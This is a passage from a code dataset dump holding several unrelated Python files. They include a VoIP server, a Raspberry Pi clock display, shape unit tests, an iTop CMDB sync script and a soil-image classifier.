root found\n\tprint (nv , b_value , s_value)\n\t\ndef problem_4():\n\tD = 1 * u.kpc\n\ta = 1 * u.au\n\tlamb = 21 * u.cm\n\tN_0 = .01 * u.pc / (u.cm ** 3)\n\trc = 1 * u.au\n\t\n\tGL = gausslens(lamb , N_0 , D , a)\n\tray_tracing(GL , .1 , -8 , 8)\n\t\n\tIL = isothermallens(lamb , N_0 , D , rc)\n\tray_tracing(IL , .075 , -4 , 4)\n\t\n\t\n\t\t\nproblem_3()\nproblem_4()\n","sub_path":"HW1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"539987437","text":"import unittest\nfrom task08 import Point2D, Rectangle, Square, Circle, Shape2DCollection\n\n\nclass TestTask08(unittest.TestCase):\n def getPoint2D(self):\n return Point2D(1, 2)\n\n def test_rectangle_includes_point2D(self):\n point2D = Point2D(4, 9)\n rectangle = Rectangle(self.getPoint2D(), 3, 9)\n self.assertIn(point2D, rectangle)\n\n def test_rectangle_not_includes_point2D(self):\n point2D = Point2D(40, 90)\n rectangle = Rectangle(self.getPoint2D(), 3, 9)\n self.assertFalse(point2D in rectangle)\n\n def test_rectangle_area(self):\n rectangle = Rectangle(self.getPoint2D(), 3, 9)\n self.assertEqual(rectangle.area, 27)\n\n def test_square_includes_point2D(self):\n square = Square(self.getPoint2D(), 8)\n self.assertIn(self.getPoint2D(), square)\n\n def test_square_not_includes_point2D(self):\n point2D = Point2D(1, 1)\n square = Square(self.getPoint2D(), 7)\n self.assertFalse(point2D in square)\n\n def test_square_area(self):\n square = Square(self.getPoint2D(), 21)\n self.assertEqual(square.area, 441)\n\n def test_circle_includes_point2D(self):\n square = Square(self.getPoint2D(), 17)\n self.assertIn(self.getPoint2D(), square)\n\n def test_circle_not_includes_point2D(self):\n point2D = Point2D(6, 90)\n square = Square(self.getPoint2D(), 72)\n self.assertFalse(point2D in square)\n\n def test_square_circle(self):\n circle = Circle(self.getPoint2D(), 34)\n self.assertEqual(circle.area, 3631.681107549801)\n\n def test_point_in_shape2DCollection(self):\n point2D = Point2D(5, 8)\n circle = Circle(self.getPoint2D(), 40)\n rectangle = Rectangle(self.getPoint2D(), 3, 9)\n square = Square(self.getPoint2D(), 30)\n shape2DCollection = Shape2DCollection()\n shape2DCollection.add(circle)\n shape2DCollection.add(rectangle)\n shape2DCollection.add(square)\n self.assertIn(point2D, shape2DCollection)\n\n def test_point_not_in_shape2DCollection(self):\n point2D = Point2D(31, 65)\n circle = Circle(self.getPoint2D(), 42)\n rectangle = Rectangle(self.getPoint2D(), 3, 9)\n square = Square(self.getPoint2D(), 30)\n shape2DCollection = Shape2DCollection()\n shape2DCollection.add(circle)\n shape2DCollection.add(rectangle)\n shape2DCollection.add(square)\n self.assertFalse(point2D in shape2DCollection)\n\n def test_square_shape2DCollection(self):\n circle = Circle(self.getPoint2D(), 62)\n rectangle = Rectangle(self.getPoint2D(), 3, 9)\n square = Square(self.getPoint2D(), 7)\n shape2DCollection = Shape2DCollection()\n shape2DCollection.add(circle)\n shape2DCollection.add(rectangle)\n shape2DCollection.add(square)\n self.assertEqual(shape2DCollection.area, 12152.282160399165)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tasks/task08/test_task08.py","file_name":"test_task08.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"338323682","text":"import numpy as np\nimport itertools\n\nXpts=[1.1, 2.01, 1.13, 1.6, 2.1, 2.5, 2.6, 2.7, 1.9, 0.5, 0.2, 0.3]\nYpts=[1.6, 2.1, 2.5, 2.6]\n\nPoints = np.array(list(itertools.product(Xpts, Ypts)))\nnp.save('data1.npy', Points)\narray_loaded = np.load('data1.npy')\nprint(array_loaded)","sub_path":"leetcode/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"112244129","text":"#MCP3008 PIN CONNECTIONS\n#CH0 - PCB Signal Line\n#VDD - 5V\n#VREF - 5V\n#AGND - GND\n#CLK - SCLK(GPIO 11)(HW 23)\n#DOUT - MISO(GPIO 9)(HW 21)\n#DIN - MOSI(GPIO 10)(HW 19)\n#CS - CE0(GPIO8)(HW 24)\n#DGND - GND\n\n#Test script to read values from the ADC\nimport time\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_MCP3008\n\n#Allows us to test ADC read/SPI speed without much Python overhead\nfrom itertools import repeat\n\n#SPI Pin configuration\nSPI_PORT = 0\nSPI_DEVICE = 0\n\nmcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))\n\n\n\nprint(\"Ctrl-C to quit\")\nprint(\"Channel 0: \")\nstart_t = time.time()\nfor unused in repeat(None, 3200):\n del unused\n print(mcp.read_adc(0))\nend_t = time.time()\nprint(\"Execution time: %s seconds\" % (end_t - start_t))","sub_path":"dev/adc_hardwareSPI.py","file_name":"adc_hardwareSPI.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"83187969","text":"a=int(input('Digite um numero:'))\n\nsoma=0\nwhile a>=0:\n i=a//10\n r=a%10\n soma=soma+5\n a=a//10\nif soma==1:\n print('Numero feliz')\nelse:\n print('Numero Infeliz')","sub_path":"moodledata/vpl_data/59/usersdata/160/51004/submittedfiles/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"288175939","text":"# base colors\nSTARTUP = (50, 50, 50)\nNEUTRAL = (0, 0, 0)\nOFF = (0, 0, 0)\n# color patterns\nSTREAM = [(128, 0, 255)]\nRECORD = [(255, 0, 0)]\nALL_OFF = [OFF]\n\nBRIGHTNESS = 0.1\n\n### Example using a 8-pixels RGBW neopixel stick\n# WHITE = const(0) # 128\n# STARTUP = (10, 10, 10, 0)\n# NEUTRAL = (0, 0, 0, 1)\n# OFF = (0, 0, 0, 0)\n# STREAM = [None] * 6 + [(128, 0, 255, WHITE)]\n# RECORD = [None] + [(255, 0, 0, WHITE)]\n# ALL_OFF = [OFF] * 8\n","sub_path":"examples/obs_remote_demo/obs_colors.py","file_name":"obs_colors.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"143298931","text":"from sqlalchemy import create_engine\nimport re\nfrom pandas import Series, DataFrame, concat\nimport pandas as pd\nfrom pymongo import MongoClient\nimport subprocess as t\nimport logging\nfrom logging.config import fileConfig\nimport configparser\n\nfileConfig('logger_config.ini')\nlogger=logging.getLogger('infoLogger')\n\nclass LoadAppsolution():\n\n def __init__(self):\n self.cfg = configparser.ConfigParser()\n self.cfg.read(\"config.ini\") \n cmdb_db = self.cfg.get(\"cmdb\",\"db\")\n cmdb_str = self.cfg.get(\"cmdb\",\"conn_str\")\n self.client = MongoClient(cmdb_str)\n self.db = self.client[cmdb_db]\n \n self.engine = create_engine(\n \"mysql+pymysql://root:Password1@127.0.0.1:3306/itop?charset=utf8\", encoding=\"utf-8\", echo=False)\n\n def load_to_itopdb(self, df, source_table_name):\n self.engine.execute(\"delete from %s\" % source_table_name)\n df.to_sql(source_table_name, con=self.engine,\n if_exists='append', index=False)\n\n def apply_by_php(self, source_table_name):\n source_table_id = source_table_name.split('_').pop()\n php_cmd = \"php -q /itop_data/http_dir/itop/synchro/synchro_exec.php --auth_user=%s --auth_pwd=%s --data_sources=%s\" % (\n 'admin', 'Password1', source_table_id)\n output = t.getoutput(php_cmd)\n logger.info(output + \"\\n\")\n\n def get_id(self, table_name):\n get_id_sql = \"select id,name from %s\" % (table_name)\n id_df = pd.read_sql(get_id_sql, con=self.engine)\n id_df['id'] = id_df['id'].map(lambda x: str(int(x)))\n return id_df\n\n def get_appsolution_src_df(self):\n appsolution_coll = self.db['merge_appsolution']\n appsolution_df = pd.DataFrame(list(appsolution_coll.find()))\n prefix = 'merge_'\n col_dict = {}\n for col in appsolution_df.columns:\n if prefix in col:\n col_dict[col] = col.split(prefix)[1]\n appsolution_src_df = appsolution_df.rename(columns=col_dict)[['environment','name']].assign(org_id=lambda x:1).assign(primary_key=lambda x:x['name'])\n # logger.info(appsolution_src_df.head(20))\n return appsolution_src_df\n\n def get_appsolution_src_df2(self):\n vm_coll = self.db['merge_virtualmachine']\n vm_df = pd.DataFrame(list(vm_coll.find()))\n appsolution_src_df = vm_df[['merge_env','merge_app']]\n appsolution_src_df=appsolution_src_df.rename(columns={\"merge_env\":\"environment\",\"merge_app\":\"name\"}).assign(org_id=lambda x:1).assign(primary_key=lambda x:x['name'])\n appsolution_src_df2=appsolution_src_df[appsolution_src_df.name!='']\n return appsolution_src_df2\n\n\n def main(self):\n appsolution_src_df = self.get_appsolution_src_df()\n self.load_to_itopdb(\n df=appsolution_src_df, source_table_name='synchro_data_applicationsolution_101')\n self.apply_by_php(source_table_name='synchro_data_applicationsolution_101')\n\n appsolution_src_df2 = self.get_appsolution_src_df2()\n self.load_to_itopdb(\n df=appsolution_src_df2, source_table_name='synchro_data_applicationsolution_101')\n self.apply_by_php(source_table_name='synchro_data_applicationsolution_101')\n\nif __name__ == '__main__':\n appsolution = LoadAppsolution()\n appsolution.main()\n","sub_path":"load_appsolution.py","file_name":"load_appsolution.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"456767844","text":"import threading\nimport struct\nimport time\nfrom socket import socket\n\nfrom .socket_controller import SocketController, SocketMode, KeyManager\nfrom .state_manager import StateManager\nfrom .recorder import Recorder\nfrom .opcodes import *\nfrom .config import *\nfrom . import loggers\nfrom . import history\n\n\nfrom .database.orm import DB, Primary\nfrom .database import Devices, GateConfig, CompConfig\n\n\nclass Server:\n def __init__(self) -> None:\n \"\"\"\n Create a new server instance.\n \"\"\"\n loggers.createFileLogger(__name__)\n\n self.log = loggers.getLogger(__name__ + '.' + self.__class__.__name__)\n\n # Create our local key manager\n self.km = KeyManager()\n\n # Create the 4 sockets the server will need to operate\n self.sock = SocketController(km=self.km)\n self.cont_sock = SocketController()\n self.udp_recv = SocketController(SocketMode.UDP, km=self.km)\n self.udp_send = SocketController(SocketMode.UDP, km=self.km)\n\n # Setup a state manager and bind it to the sockets\n self.sm = StateManager(self.sock, self.cont_sock, self.km)\n # Setup a recorder\n self.recorder = Recorder()\n\n # Bind all the sockets to their respective hosts and ports\n self.udp_recv.bind('', TCP_PORT)\n self.udp_recv.start()\n\n self.sock.bind(HOST, TCP_PORT)\n self.sock.listen(10)\n\n self.cont_sock.bind(HOST, CONTROL_PORT)\n self.cont_sock.listen(10)\n self.cont_udp_port = None\n\n self.sock.start()\n self.cont_sock.start()\n\n self.udp_lock = threading.Lock()\n self.udp_listeners = {}\n\n # Bind event hooks to the controller\n self.sock.tcp_lost_hook = self.tcp_lost\n self.sock.new_tcp_hook = self.new_tcp\n\n def tcp_lost(self, sock: socket, _) -> None:\n \"\"\"\n A handler that is bound to a socket controller, called when a TCP\n client disconnects. This function grabs the udp mutex, then clears out\n any now-unneeded state for that client.\n \"\"\"\n with self.udp_lock:\n client_id = self.km.id_from_sock(sock)\n if not client_id:\n # Not sure who this socket was, ignore them.\n return\n\n if client_id in self.udp_listeners:\n del self.udp_listeners[client_id]\n self.km.forget(client_id)\n\n # Log the event\n target_device = Devices.select(deviceID=client_id.decode('latin-1'))\n if target_device:\n history.insert(target_device, history.EVENT_DCON)\n\n # Inform the control surface a client has left.\n self.cont_sock.send_packet(CLIENT_LEAVE, client_id)\n\n def new_tcp(self, sock: socket, addr, client_id: bytes) -> None:\n \"\"\"\n A hook bound to socket controllers, called when a client completes\n their handshake. This function is responsible for saving and loading\n data from the database to retain state between sessions.\n \"\"\"\n # TODO: This!\n # This should be based off the pubkey.\n target_device = Devices.select(deviceID=client_id.decode('latin-1'))\n\n if not target_device:\n self.log.debug('Device not found in database.')\n # Create the audio config pair\n gate = GateConfig(*self.sm.gates[client_id])\n comp = CompConfig(*self.sm.compressors[client_id])\n # Insert them so they get identifiers\n GateConfig.insert(gate)\n CompConfig.insert(comp)\n\n # Create the core device config\n target_device = Devices(\n client_id.decode('latin-1'), \"\", addr[0],\n self.sm.names[client_id],\n False, gate, comp\n )\n\n # Register the device to the database\n Devices.insert(target_device)\n else:\n self.log.debug('Restoring device config from database.')\n # Restore all the configuation from the located device\n dev = target_device[0]\n self.sm.set_name(client_id, dev.name)\n\n self.sm.set_gate(\n client_id, (dev.gate.attack, dev.gate.hold,\n dev.gate.release, dev.gate.threshold)\n )\n self.sm.set_compressor(\n client_id, (dev.gate.attack, dev.gate.release,\n dev.gate.threshold)\n )\n \n # Log the event\n history.insert(target_device, history.EVENT_CONN)\n \n def udp_mainloop(self):\n \"\"\"\n The mainloop for UDP sections of the server. This handles mainly\n routing of audio between mutliple clients.\n \"\"\"\n while True:\n pkt = self.udp_recv.get_packet(True)\n self.log.debug(f'UDP packet from {pkt[1]}: {pkt[2].opcode}')\n if pkt[2].opcode == AUDIO:\n # Try feed the packet to the recorder. This may fail if there\n # is a disk IO failure, or if the audio payload is malformed.\n try:\n self.recorder.feed(pkt[2].client_id, pkt[2].payload)\n except Exception as e:\n self.log.warning(f'Failed to record audio for {pkt[2].client_id}: {e}')\n\n # Grab the UDP mutex for a short period\n with self.udp_lock:\n listeners = dict(self.udp_listeners)\n # Locate all the clients in the same room\n can_listen = set(sum([i for i in self.sm.rooms\n if pkt[2].client_id in i], []))\n # If a control surface is attached, forward the packet\n # there, too.\n if self.cont_udp_port is not None:\n can_listen.add(self.cont_udp_port)\n\n # Retransmit the audio to all clients allowed to listen.\n for i in can_listen:\n if pkt[2].client_id != i and i in listeners:\n self.udp_send.send_packet(\n AUDIO, pkt[2].payload, to=listeners[i],\n client_id=i, origin=pkt[2].client_id)\n\n def cont_mainloop(self):\n \"\"\"\n The mainloop responsible for interactions with the control surface.\n \"\"\"\n while True:\n pkt = self.cont_sock.get_packet(True)\n\n self.log.debug(f'CONT packet from {pkt[1]}: {pkt[2].opcode}')\n if pkt[2].opcode == SET_GATE:\n try:\n # Decode the parameters from the payload\n client_id = pkt[2].payload[:16]\n attack, hold, release, threshold, nonce = (\n struct.unpack('!4lH', pkt[2].payload[16:])\n )\n attack = max(0, min(65535, attack))\n hold = max(0, min(65535, hold))\n release = max(0, min(65535, release))\n threshold = max(0, min(65535, threshold))\n\n # Locate the targeted client\n sock = self.km.sock_from_id(client_id)\n if sock is not None:\n # Inform the client of the change\n self.sock.send_packet(\n SET_GATE,\n pkt[2].payload[16:],\n to=sock,\n client_id=client_id\n )\n # Update the state manager\n self.sm.set_gate(\n client_id, (attack, hold, release, threshold)\n )\n # Inform the control surface of the success state\n self.cont_sock.send_packet(\n SET_FAIL if sock is None else SET_ACK,\n struct.pack('!H', nonce), to=pkt[0])\n except struct.error:\n self.log.warning('Failed to decode CONT packet')\n elif pkt[2].opcode == SET_COMP:\n try:\n # Dedcode the parameters from the payload\n client_id = pkt[2].payload[:16]\n attack, release, threshold, nonce = (\n struct.unpack('!3lH', pkt[2].payload[16:])\n )\n attack = max(0, min(65535, attack))\n release = max(0, min(65535, release))\n threshold = max(0, min(65535, threshold))\n\n # Locate the targeted client\n sock = self.km.sock_from_id(client_id)\n if sock is not None:\n # Inform the client of the changes\n self.sock.send_packet(\n SET_COMP,\n pkt[2].payload[16:],\n to=sock,\n client_id=client_id\n )\n # Update the state manager\n self.sm.set_compressor(\n client_id,\n (attack, release, threshold)\n )\n # Inform the control surface of the success state\n self.cont_sock.send_packet(\n SET_FAIL if sock is None else SET_ACK,\n struct.pack('!H', nonce), to=pkt[0])\n except struct.error:\n self.log.warning('Failed to decode CONT packet')\n elif pkt[2].opcode == SET_NAME:\n # Extract the name from the payload\n client_id = pkt[2].payload[:16]\n # Update the state manager\n self.sm.set_name(\n client_id, pkt[2].payload[16:271].decode('latin-1')\n )\n elif pkt[2].opcode == SET_ROOMS:\n # Decode the list from the payload\n client_id = pkt[2].payload[:16]\n room_n = pkt[2].payload[16]\n rooms = pkt[2].payload[17: 17 + room_n]\n # Update the state manager\n self.sm.set_rooms(client_id, rooms)\n\n # Log the event\n target_device = Devices.select(deviceID=client_id.decode('latin-1'))\n if target_device:\n history.insert(target_device, history.EVENT_TEXT, 'Moved rooms')\n elif pkt[2].opcode == START_RECORD:\n # Decode the payload\n client_id = pkt[2].payload[:16]\n self.recorder.recording.add(client_id)\n self.recorder.rec_start[client_id] = time.time()\n\n # Log the event\n target_device = Devices.select(deviceID=client_id.decode('latin-1'))\n if target_device:\n history.insert(target_device, history.EVENT_TEXT, 'Recording started')\n elif pkt[2].opcode == STOP_RECORD:\n # Decode the payload\n client_id = pkt[2].payload[:16]\n if client_id in self.recorder.recording:\n # Stop recording the client\n self.recorder.recording.remove(client_id)\n if client_id in self.recorder.recordings:\n # Write any remaining buffer to disk\n self.recorder.recordings[client_id].flush()\n self.recorder.recordings[client_id].finish()\n # Clean up after the recorder\n del self.recorder.recordings[client_id]\n del self.recorder._decoders[client_id]\n del self.recorder._counts[client_id]\n \n # Log the event\n target_device = Devices.select(deviceID=client_id.decode('latin-1'))\n if target_device:\n history.insert(target_device, history.EVENT_TEXT, 'Recording stopped')\n elif pkt[2].opcode == GET_RECORD:\n # Decode the payload\n client_id = pkt[2].payload[:16]\n if client_id not in self.recorder.recording:\n # Send a dummy message\n self.cont_sock.send_packet(GET_RECORD, b'Not recording', to=pkt[0])\n else:\n # Convert seconds into a nicer format\n rec_len = time.time() - self.recorder.rec_start.get(client_id, time.time())\n ms = int(round(rec_len % 1, 3) * 1000)\n mi, se = divmod(int(rec_len), 60)\n hr, mi = divmod(mi, 60)\n dur = f'{hr:02}:{mi:02}:{se:02}.{ms:0<3}'.encode()\n # Respond to the client\n self.cont_sock.send_packet(GET_RECORD, b'Recording.. ' + dur, to=pkt[0])\n elif pkt[2].opcode == REGISTER_UDP:\n # Register the UDP recieve port for the control surface.\n try:\n self.cont_udp_port = struct.unpack('!H', pkt[2].payload)[0]\n except struct.error:\n self.log.warning(\n 'Invalid packet when registering UDP port'\n )\n\n def mainloop(self):\n \"\"\"\n The mainloop for client TCP sockets. This is largely responsible for\n register UDP connections, as encryption is handler by socket\n controllers.\n \"\"\"\n threading.Thread(target=self.udp_mainloop, daemon=True).start()\n threading.Thread(target=self.cont_mainloop, daemon=True).start()\n\n while True:\n pkt = self.sock.get_packet(True)\n\n self.log.debug(f'TCP packet from {pkt[1]}: {pkt[2].opcode}')\n if pkt[2].opcode == REGISTER_UDP:\n # Attempt to decode the packet\n try:\n udp_port = struct.unpack('!H', pkt[2].payload)[0]\n\n self.udp_listeners[pkt[2].client_id] = (\n pkt[1][0], # Source IP\n udp_port\n )\n except struct.error:\n self.log.warning(\n 'Invalid packet when registering UDP port'\n )\n\n\nif __name__ == '__main__':\n Server().mainloop()\n","sub_path":"voiplib/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":14356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"54845797","text":"import time\nimport subprocess\nimport digitalio\nimport board\nfrom PIL import Image, ImageDraw, ImageFont\nimport adafruit_rgb_display.st7789 as st7789\nimport adafruit_rgb_display.ili9341 as ili9341\nimport adafruit_rgb_display.hx8357 as hx8357\nimport adafruit_rgb_display.st7735 as st7735\nimport adafruit_rgb_display.ssd1351 as ssd1351\nimport adafruit_rgb_display.ssd1331 as ssd1331 \n\n# Configuration for CS and DC pins (these are FeatherWing defaults on M0/M4):\ncs_pin = digitalio.DigitalInOut(board.CE0)\ndc_pin = digitalio.DigitalInOut(board.D25)\nreset_pin = digitalio.DigitalInOut(board.D24)\n\n# Config for display baudrate (default max is 24mhz):\nBAUDRATE = 24000000\n\n# Setup SPI bus using hardware SPI:\nspi = board.SPI()\n\n# Create the ST7789 display:\ndisp = st7789.ST7789(\n spi,\n cs=cs_pin,\n dc=dc_pin,\n rst=reset_pin,\n baudrate=BAUDRATE,\n width=135,\n height=240,\n x_offset=53,\n y_offset=40,\n)\n\n# setup for buttons\nbacklight = digitalio.DigitalInOut(board.D22)\nbacklight.switch_to_output()\nbacklight.value = True\nbuttonA = digitalio.DigitalInOut(board.D23)\nbuttonB = digitalio.DigitalInOut(board.D24)\nbuttonA.switch_to_input()\nbuttonB.switch_to_input()\n\n# Create blank image for drawing.\n# Make sure to create image with mode 'RGB' for full color.\nheight = disp.width # we swap height/width to rotate it to landscape!\nwidth = disp.height\nimage = Image.new(\"RGB\", (width, height))\nimage1 = Image.new(\"RGB\", (width, height))\nrotation = 90\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\ndraw1 = ImageDraw.Draw(image1)\n\n# Draw a black filled box to clear the image.\ndraw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))\ndraw1.rectangle((0,0,width,height),outline=0,fill=(0,0,0))\ndisp.image(image, rotation)\n\n# Draw some shapes.\n# First define some constants to allow easy resizing of shapes.\npadding = -2\ntop = padding\nbottom = height - padding\n# Move left to right keeping track of the current x position for drawing shapes.\nx = 0\n\nimage1 = Image.open(\"red.jpg\")\n\n# Scale image to smaller screen dimension\nimage_ratio = image.width / image.height\nscreen_ratio = width / height\nif screen_ratio < image_ratio:\n scaled_width = image.width * height // image.height\n scaled_height = height\nelse:\n scaled_width = width\n scaled_height = image.height * width // image.width\nimage1 = image1.resize((scaled_width, scaled_height), Image.BICUBIC)\n\n# Alternatively load a TTF font. Make sure the .ttf font file is in the\n# same directory as the python script!\n# Some other nice fonts to try: http://www.dafont.com/bitmap.php\nfont = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 18)\nfont1 = ImageFont.truetype(\"/usr/share/fonts/truetype/piboto/Piboto-Bold.ttf\", 22)\n\n# Turn on the backlight\nbacklight = digitalio.DigitalInOut(board.D22)\nbacklight.switch_to_output()\nbacklight.value = True\n\nstate = 0\nstate_timer = 0\nstart = time.time()\nwhile True:\n # Draw a black filled box to clear the image.\n draw.rectangle((0, 0, width, height), outline=0, fill=0)\n #draw1.rectangle((0,0,width,height),outline=0,fill=0)\n #TODO: fill in here. You should be able to look in cli_clock.py and stats.py\n # Display image.\n \n if buttonA.value and buttonB.value:\n backlight.value = False\n else:\n backlight.value = True\n \n if buttonB.value and not buttonA.value: # just button A pressed\n if state==0:\n clocktime = time.strftime(\"%A, %B %e, %Y\")\n draw.text((x,top), clocktime, font=font1, fill=\"#03cafc\")\n clocktime2 = time.strftime(\"%H:%M:%S\")\n y = top + font.getsize(clocktime)[1]\n draw.text((x, y), clocktime2, font=font1, fill=\"#1303fc\")\n disp.image(image, rotation)\n time.sleep(1)\n state = 1\n elif state==1:\n clocktime = time.strftime(\"%A, %B %e, %Y\")\n draw.text((x,top), clocktime, font=font1, fill=\"#03cafc\")\n clocktime2 = time.strftime(\"%I:%M:%S\")\n y = top + font.getsize(clocktime)[1]\n draw.text((x,y), clocktime2, font=font1, fill=\"#7703fc\")\n disp.image(image, rotation)\n time.sleep(1)\n state = 0\n\n if buttonA.value and not buttonB.value: # just button B pressed\n #draw1.rectangle((0,0,width,height),outline=0,fill=0)\n x1 = scaled_width // 2 - width // 2\n y1 = scaled_height // 2 - height // 2\n image1 = image1.crop((x1,y1,x1+width, y1+height))\n clear = image1.copy()\n draw1 = ImageDraw.Draw(clear)\n if state_timer == 0:\n txt = \"Start!\"\n draw1.text((10,5),txt, font=font1,fill=\"#7703fc\")\n start = time.time()\n disp.image(clear, rotation)\n time.sleep(1)\n state_timer = 1\n elif state_timer == 1:\n txt = \"End!\"\n draw1.text((10,5),txt, font=font1,fill=\"#7703fc\")\n end = time.time()\n y = 5+font1.getsize(txt)[1]\n result = round(end-start,2)\n draw1.text((10,y),str(result)+\" s\",font=font1,fill=\"#7703fc\")\n disp.image(clear, rotation)\n time.sleep(1)\n state_timer = 0\n\t\n","sub_path":"Lab 2/screen_clock.py","file_name":"screen_clock.py","file_ext":"py","file_size_in_byte":5190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"576944244","text":"print('start')\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom sklearn.model_selection import train_test_split \nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.optimizers import RMSprop\nfrom scipy import stats\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport os\nimport pathlib\nimport matplotlib.pyplot as plt\n\n\n# Vegetation removal as image preprocessing \n\n\ndata_dir='/workspace/storage/basedata/'\ndef get_list(a):\n\tcur_dir=os.path.join(data_dir,a)\n\tfilename = os.listdir(cur_dir)\n\tfor i in range(len(filename)):\n\t\tfilename[i]=os.path.join(cur_dir,filename[i])\n\treturn filename\n\n\n\n\na='alluvial/'\nb='black/'\nd='desert/'\nr='red/'\nf_img_arr=[]\nX=[]\nlabels=[]\nX = get_list(a)\nl=len(X)\nfor i in range(l):\n labels.append(0)\nX=X+get_list(b)\nl1=len(X)\nl=l1-l\nfor i in range(l):\n labels.append(1)\nl=l1\nX=X+get_list(d)\nl1=len(X)\nl=l1-l\nfor i in range(l):\n labels.append(2)\nl=l1\nX=X+get_list(r)\nl1=len(X)\nl=l1-l\nfor i in range(l):\n labels.append(3)\nl=l1\n\n#vegetation removl for all images individually\n# also used to print qualitative result\n\nno_of_loops=1\nacc=0\ntest_labels_before=[]\ntest_labels_after=[]\ntest_names=[]\nfor t in range(no_of_loops):\n\tX_train, X_test, y_train, y_test = train_test_split(X, labels, test_size = 0.2, random_state=42)\n\ttest_labels_before=y_test\n\ttest_names=X_test\n\n\n\tprint('train-test-split')\n\tprint(len(X_test))\n\n\n\n\n\tdef get_img(filename): \n\t\t\n\t\timg_array=[]\n\t\tfor i in range(0,len(filename)):\n\t\t\timg=cv2.imread(filename[i])\n\t\t\timg=cv2.resize(img,(1000,1000))\n\t\t\t# cur_img=cur_img.astype(np.float32)\n\t\t\t\n\t\t\theight, width, depth = img.shape\n\t\t\tmask = np.zeros((height, width), dtype = img.dtype)\n\n\t\t\tfor i in range(height) :\n\t\t\t\tfor j in range(width) :\n\t\t\t\t\tif(img[i][j][0] > 100\n\t\t\t\t\t\tand img[i][j][0] < 200\n\t\t\t\t\t\tand img[i][j][1] > 100\n\t\t\t\t\t\tand img[i][j][1] < 200\n\t\t\t\t\t\tand img[i][j][2] > 100\n\t\t\t\t\t\tand img[i][j][2] < 200) :\n\t\t\t\t\t\tmask[i][j] = 1\n\n\n\t\t\ttemp_img = cv2.bitwise_and(img, img, mask=mask)\n\t\t\ttemp_img=temp_img.astype(np.float32)\n\t\t\ttemp_img=temp_img/255\n\t\t\tif type(img_array)==list:\n\t\t\t\timg_array=np.array([temp_img])\n\t\t\telse:\n\t\t\t\timg_array=np.append(img_array,[temp_img],axis=0)\n\t\t\n\t\treturn img_array\n\n\n\n\n\tX_train= get_img(X_train)\n\n\n\n\tprint(X_train.shape)\n\n\tprint('absdiff calculated')\n\n\n\n\n\n\n\tonehot=[]\n\tfor value in y_train:\n\t\tletter = [0 for _ in range(4)]\n\t\tletter[value] = 1\n\t\tonehot.append(np.array(letter))\n\n\ty_train=np.array(onehot)\n\n\n\tprint('one-hot endoded')\n\n\n\tmodel = tf.keras.models.Sequential([\n\t\t\t\t\t\t\t\t\t\t\t# tf.keras.layers.experimental.preprocessing.Rescaling(1./255),\n\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.Conv2D(8,(15,15),activation='relu',input_shape=(1000,1000,3)),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.MaxPool2D(4,4),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.Conv2D(16,(15,15),activation='relu'),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.MaxPool2D(4,4),\n\t\t\t\t\t\t\t\t\t\t# #\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.Conv2D(32,(15,15),activation='relu'),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.MaxPool2D(4,4),\n\t\t\t\t\t\t\t\t\t\t# #\n\t\t\t\t\t\t\t\t\t\t# tf.keras.layers.Conv2D(64,(15,15),activation='relu'),\n\t\t\t\t\t\t\t\t\t\t# tf.keras.layers.MaxPool2D(4,4),\n\t\t\t\t\t\t\t\t\t\t# tf.keras.layers.Conv2D(128,(15,15),activation='relu'),\n\t\t\t\t\t\t\t\t\t\t# tf.keras.layers.MaxPool2D(4,4),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.Flatten(),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.Dense(256,activation='relu'),\n\t\t\t\t\t\t\t\t\t\ttf.keras.layers.Dense(4,activation='softmax')\n\t])\n\t# model.summary()\n\n\tmodel.compile(loss='categorical_crossentropy',\n\toptimizer=RMSprop(lr=0.001),\n\tmetrics=['accuracy'])\n\n\n\tmodel.summary()\n\n\tmodel.fit(\n\t\tx=X_train,\n\t\ty=y_train,\n\t\tvalidation_split=0.125,\n\t\t# validation_data=val_ds,\n\t\tsteps_per_epoch=10,\n\t\tepochs=10,\n\t)\n\n\tprint('model fitted')\n\n\n\n\tprint('testing starts')\n\n\t# model.predict(test_ds)\n\tres=[]\n\tfor i in range(len(X_test)):\n\t\timg=cv2.imread(X_test[i])\n\t\timg=cv2.resize(img,(1000,1000))\n\t\tarr=[]\n\t\theight, width, depth = img.shape\n\t\tmask 